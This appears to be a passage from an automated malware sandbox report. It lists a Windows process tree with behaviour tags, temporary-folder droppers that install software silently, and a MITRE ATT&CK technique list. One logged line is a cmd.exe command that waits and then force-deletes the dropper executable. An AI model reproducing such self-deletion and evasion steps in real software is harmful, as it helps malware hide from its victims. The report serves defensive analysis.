1⤵
- Loads dropped DLL
- Modifies registry class
PID:8868

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:10084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k wsappx -s AppXSvc
1⤵
PID:4660

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:7016

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:8496

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:9772

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
PID:9896

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6240

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8784

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:9984

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5832

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5844

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4124

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7260

C:\Users\Admin\AppData\Local\Temp\C7CD.exe
C:\Users\Admin\AppData\Local\Temp\C7CD.exe
1⤵
- Loads dropped DLL
- Enumerates connected drives
PID:6536
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\DB Software Laboratory\Svn Syncronize Management 1.7.3.2\install\97C955F\adv.msi" AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\C7CD.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632862088 " AI_EUIMSI=""
  2⤵
  - Enumerates connected drives
  PID:192

C:\Users\Admin\AppData\Local\Temp\D366.exe
C:\Users\Admin\AppData\Local\Temp\D366.exe
1⤵
PID:5080

C:\Users\Admin\AppData\Local\Temp\EBC2.exe
C:\Users\Admin\AppData\Local\Temp\EBC2.exe
1⤵
PID:6576
- C:\Users\Admin\AppData\Local\Temp\is-N9BVG.tmp\EBC2.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-N9BVG.tmp\EBC2.tmp" /SL5="$202F8,4844586,831488,C:\Users\Admin\AppData\Local\Temp\EBC2.exe"
  2⤵
  PID:9952
- - C:\Users\Admin\AppData\Local\Temp\EBC2.exe
    "C:\Users\Admin\AppData\Local\Temp\EBC2.exe" /VERYSILENT
    3⤵
    PID:4668
  - - C:\Users\Admin\AppData\Local\Temp\is-QEBAR.tmp\EBC2.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-QEBAR.tmp\EBC2.tmp" /SL5="$302F8,4844586,831488,C:\Users\Admin\AppData\Local\Temp\EBC2.exe" /VERYSILENT
      4⤵
      Checks whether UAC is enabled
      PID:7544
    - - C:\Users\Admin\AppData\Roaming\SketchLib SDK Client\SketchClient.exe
        
        "C:\Users\Admin\AppData\Roaming\SketchLib SDK Client\SketchClient.exe"
        5⤵
        
        PID:7780

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:10044

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7464

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5088

C:\Windows\system32\WerFault.exe
"C:\Windows\system32\WerFault.exe" -k -lc PoW32kWatchdog PoW32kWatchdog-20210928-2112.dm
1⤵
PID:5020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:7584

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:8024

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4904

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:9728

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:7436

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6752

C:\Users\Admin\AppData\Local\Temp\7663.exe
C:\Users\Admin\AppData\Local\Temp\7663.exe
1⤵
PID:6636
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\7663.exe"
  2⤵
  PID:7944
- - C:\Windows\SysWOW64\timeout.exe
    timeout /T 10 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:6096

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6784

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9884

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

Persistence

Account Manipulation

T1098

BITS Jobs

T1197

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

Privilege Escalation

New Service

T1050

Scheduled Task

Defense Evasion

BITS Jobs

T1197

Disabling Security Tools

T1089

Install Root Certificate

T1130

Modify Registry

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Security Software Discovery

T1063

Software Discovery

T1518

System Information Discovery